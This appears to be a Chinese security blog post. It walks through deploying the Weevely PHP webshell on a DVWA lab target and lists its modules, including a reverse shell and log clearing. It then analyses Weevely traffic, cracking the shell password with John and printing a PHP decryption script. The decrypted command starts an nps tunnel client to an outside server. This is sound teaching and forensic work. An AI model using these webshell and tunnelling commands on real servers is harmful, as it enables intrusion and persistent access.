目录
技能展示
文章
日记
时间线
项目展示
分类
标签
Android Bash Burp C++ CS CTF DLL劫持 Docker Fastjson Fastjson2 FNV-1a FreeCMS FRP GetShell GitHub IPv6 Java JNDI John JS加密 JS逆向 K8s Kafka Kali lama-cleaner Linux mitmproxy MSF MySQL Nim Nmap NPS Office OID Payload Phar PHP phpMyAdmin POP链 PWN Pyinstaller Python RCE RSA Shellcode SNMP SQL注入 SSH SSRF Ubuntu USB Web Webshell Web安全 Windows XSS YAML Zookeeper 主机探测 代码审计 伪协议 免杀 内网 内网穿透 加密 加解密 参数 反序列化 反弹shell 命令 哈希碰撞 图像处理 域渗透 字符串逃逸 容器 密码学 密码破解 提权 数据库 文件上传 日志分析 未授权访问 权限维持 汇总 流量分析 消息队列 溯源 漏洞 漏洞分析 漏洞利用 端口扫描 编译 网络管理 资产探测 跨平台 运维 进程隐藏 逆向
目录
目录
1405 字
7 分钟
Weevely 使用与流量分析
Weevely 使用与流量分析
一、weevely生成、上传、连接、执行
weevely前言
1Webshell是经常被使用的攻击手法,一般会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或php后门,得到一个命令执行环境,以达到控制网站服务器的目的简介
1(在Linux中已经集成安装了)2
3weevely是一款使用python编写针对PHP的webshell工具,采用c/s模式构建,能模拟一个类似于telnet的连接shell。4
5使用的是比较主流的base64加密结合字符串变形技术,后门中所使用的函数均是常用的字符串处理函数,有很好的隐蔽性。6
7weevely具有生成shell文件、连接后台、资源搜索、信息探测、文件管理操作、错误配置审计、暴力破解、数据库操作、端口扫描等功能第一步:查看是否安装weevely,并查看版本信息
1打开终端,输入weevely,检查是否安装了weevely,如果安装过,就能看见版本信息,并能看见基本的使用说明
第二步:生成shell(php)文件
1weevely generate <password> <path>/xx.php2
3我这里输入的是weevely generate 111 /root/1.php4
5(这个path是已经存在的路径,而后面的文件是将要在这个目录下生成的shell文件)

第三步:上传文件到目标服务器
1我这里使用owaspbwa靶机来试
找到upload上传地方,然后上传生成的shell(php)文件

查看上传文件所在的地址(真实中,文件目录啥的都可以扫出来)

第四步:在终端使用weevely,连接到shell(php文件)
1weevely <url> <password>2
3我这里输入的是weevely http://192.168.190.130/dvwa/hackable/uploads/1.php 1114
5这里的URL指文件上传后的文件所在地址
第五步:执行相关系统命令,获取相关信息
1第一次执行的提示Permission denied(权限不够)2
3然后下面就进入到上传到的那个文件夹里面了
然后再加上ls
就成功了

第六步:调用weevely模块
1执行更多的操作,输入help命令可以查看相关的命令
随机试一个幸运儿

小白初试使用方法:
1不知道模块的命令的话,就可以把命令输入,然后查看给出的提示
模块大全:
1:backdoor_reversetcp 执行反向TCP shell2
3:backdoor_tcp 在TCP端口产生一个壳4
5:file_cp 复制单个文件6
7 :file_grep 打印线与多个文件中的模式匹配8
9 :file_zip 压缩或展开ZIP文件10
11 :file_bzip2 压缩或展开Bzip2文件12
13:file_tar 压缩或展开tar文件14
15 :file_gzip 压缩或展开Gzip文件16
17:file_mount 使用httpfs安装远程文件系统18
19 :file_cd 更改当前工作目录20
21 :file_clearlog 从文件中删除字符串22
23 :file_read 从远程文件系统中读取远程文件24
25:file_download 从远程文件系统下载文件26
27 :file_touch 更改文件时间戳28
29 :file_ls 列表目录内容30
31 :file_enum 检查存在列表列表的存在和权限32
33:file_upload 将文件上传到远程文件系统34
35 :file_find 查找具有给定名称和属性的文件36
37 :file_check 获取文件的属性和权限38
39 :file_edit 在本地编辑器上编辑远程文件40
41 :file_webdownload 下载URL.42
43 :file_upload2web 将文件自动上传到Web文件夹并获得相应的URL44
45:file_rm 删除远程文件46
47 :shell_php 执行php命令48
49 :shell_sh 执行shell命令50
51:shell_su 执行su的命令52
53:sql_dump 多DBMS MySqldump更换54
55:sql_console 执行SQL查询或运行控制台56
57 :bruteforce_sql BruteForce SQL数据库58
59:net_ifconfig 获取网络接口地址60
61:net_mail 发送邮件62
63 :net_curl 执行类似卷曲的HTTP请求。64
65 :net_scan TCP端口扫描。66
67 :net_proxy 运行本地代理以通过目标浏览HTTP / HTTPS浏览。68
69 :net_phpproxy 在目标上安装PHP代理。70
71:system_info 收集系统信息。72
73 :system_extensions 收集PHP和WebServer扩展列表。74
75 :system_procs 列出运行进程。76
77:audit_phpconf 审核PHP配置。78
79 :audit_suidsgid 查找suid或sgid标志的文件。80
81 :audit_disablefunctionbypass 旁路禁用与mod_cgi和.htaccess的限制。82
83 :audit_filesystem 审核文件系统以获取弱权限。84
85 :audit_etcpasswd 用不同的技术读取 / etc / passwd。二、Weevely流量分析
文件生成
1# weevely generate <password> <filename>2
3┌──(root㉿kali)-[/home/dcj/Desktop]4└─# weevely generate 123456 1.php5Generated '1.php' with password '123456' of 692 byte size.
解密分析

1根据上几节分析可确定Weevely工具特征:2请求body字段为:随机16个字节+12个字节秘钥+echo(X);的加密字符串+12个字节秘钥+16个随机字节。3响应body字段为:随机16个字节+12个字节秘钥(与请求中相同)+请求中X加密字符串+12个字节秘钥(与请求中相同)。4
5# 解密为中间Qf开头的内容!!!1webshell为加密的文件
1# phar进行解密2┌──(root㉿kali)-[/home/dcj/Desktop]3└─# phar extract -f 1.php4//home/dcj/Desktop/1.php/x ...ok
1# $k、$kh、$kf拼接为密码的md52$k="e10adc39";$kh="49ba59abbe56";$kf="e057f20f883e"3
4# e10adc3949ba59abbe56e057f20f883e1┌──(root㉿kali)-[/home/dcj/Desktop]2└─# echo "e10adc3949ba59abbe56e057f20f883e:" > hash1.txt3
4┌──(root㉿kali)-[/home/dcj/Desktop]5└─# john --format=Raw-MD5 --wordlist=/usr/share/wordlists/rockyou.txt hash1.txt6Using default input encoding: UTF-87Loaded 1 password hash (Raw-MD5 [MD5 256/256 AVX2 8x3])8Warning: no OpenMP support for this hash type, consider --fork=49Press 'q' or Ctrl-C to abort, almost any other key for status10123456 (?)111g 0:00:00:00 DONE (2024-11-01 21:16) 100.0g/s 38400p/s 38400c/s 38400C/s 123456..michael112Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably13Session completed.解密脚本
1<?php2$k = "9e7ace81";3$kh = "eb5d8c8e66d1";4$kf = "5edcaf439d42";5$p = "CyPJLZj1JqdKeIm5";6
7function x($t, $k) {8 $c = strlen($k);9 $l = strlen($t);10 $o = "";11
12 for ($i = 0; $i < $l;) {13 for ($j = 0; ($j < $c && $i < $l); $j++, $i++) {14 $o .= $t[$i] ^ $k[$j];15 }16 }17 return $o;18}19
20//$m = "Qfl6qqJvunEp5dY28kBKxunL8ClrSiUKHbgTA3giT/BlfHBMoRL3EZuO+J5SWJsmgbek7a4N8X3qASu+eLY1hv/m3rjR4mCUIHcy23ETuemO0Hv3lfBi9lPY2anUSYsrIMNlS/arWCilWQthWJOZvG/NaWlNIZoLVCIgbxpLzDsOnvL9qmdyZB3ydTUgbicRFz/bw7wX/I+OkAWIXPr2Xs+rdlYQfl6qqJvunEp5dY28kBKxunL8ClrSiUKHbgTA3giT/BlfHBMoRL3EZuO+J5SWJsmgbek7a4N8X3qASu+eLY1hv/m3rjR4mCUIHcy23ETuemO0Hv3lfBi9lPY2anUSYsrIMNlS/arWCilWQthWJOZvG/NaWlNIZoLVCIgbxpLzDsOnvL9qmdyZB3ydTUgbicRFz/bw7wX/I+OkAWIXPr2Xs+rdlY";21//$m = "Qfl6qtJv+gEt4NY2SsSM+FmHH3fH7puy/Chzg44IK5lw3Io7Jp/WZykUDRGbWp5Wy2dgGvHcgWoLhg97pLL2xY4u0KBvCUEvRghENPctLNh1vXADfD+BrYbK4Vs0PO6iNkn8d3qjYhtsKVd4/7kGMUKTBkVKzy+zsuxfl8jes+qTdw2kpgMONovlZXz0wptZV2QJIf/RYBaGAbCiA74B40bbr793YXqS5edcaf439d42";22$m = "Qfl67CIO+gEhJcgrawfrcqrTubhK8GUN11XuLCcnxOstshOa8dNe00Y6QHjYW+bSPOnTz5fAe6exNJX5xSzQ4UZvj2RT8hzsh2eVpFDniykDtoUdBVvCMQQuu7TgRmQpni3RYCSlgkkQHMY9ksfamszD/apE97VmsRBENFE6WcY8mAcdpFDxc001MISr96yKXFTofyljnejHw/fkrX+Ksc1rfToh/s9b7RNIWTPbuF3uJ88hyuWd9sURk6wDsVdxdvlZqfyXPu/yE6GZ3BvDyTg6GTGo5edcaf439d42";23
24// 使用 @ 来抑制可能发生的警告或错误25$result = @gzuncompress(@x(@base64_decode($m), $k));26
27// 输出结果28echo $result;29?>1# try {chdir('/var/www/html/extend');@error_reporting(0);@system('nohup ./npc -server=192.168.18.37:8024 -vkey=fkca03riqemuuzy7 -type=tcp & 2>&1');}catch(Exception $e){echo "fQ8vhoERR".$e->getTrace()[0]["function"].": ".$e->getMessage()."fQ8vhoERR";}1得到了代理工具nps的vkey=fkca03riqemuuzy7部分信息可能已经过时
目录
技能展示
文章
日记
时间线
项目展示
分类
标签
Android Bash Burp C++ CS CTF DLL劫持 Docker Fastjson Fastjson2 FNV-1a FreeCMS FRP GetShell GitHub IPv6 Java JNDI John JS加密 JS逆向 K8s Kafka Kali lama-cleaner Linux mitmproxy MSF MySQL Nim Nmap NPS Office OID Payload Phar PHP phpMyAdmin POP链 PWN Pyinstaller Python RCE RSA Shellcode SNMP SQL注入 SSH SSRF Ubuntu USB Web Webshell Web安全 Windows XSS YAML Zookeeper 主机探测 代码审计 伪协议 免杀 内网 内网穿透 加密 加解密 参数 反序列化 反弹shell 命令 哈希碰撞 图像处理 域渗透 字符串逃逸 容器 密码学 密码破解 提权 数据库 文件上传 日志分析 未授权访问 权限维持 汇总 流量分析 消息队列 溯源 漏洞 漏洞分析 漏洞利用 端口扫描 编译 网络管理 资产探测 跨平台 运维 进程隐藏 逆向
目录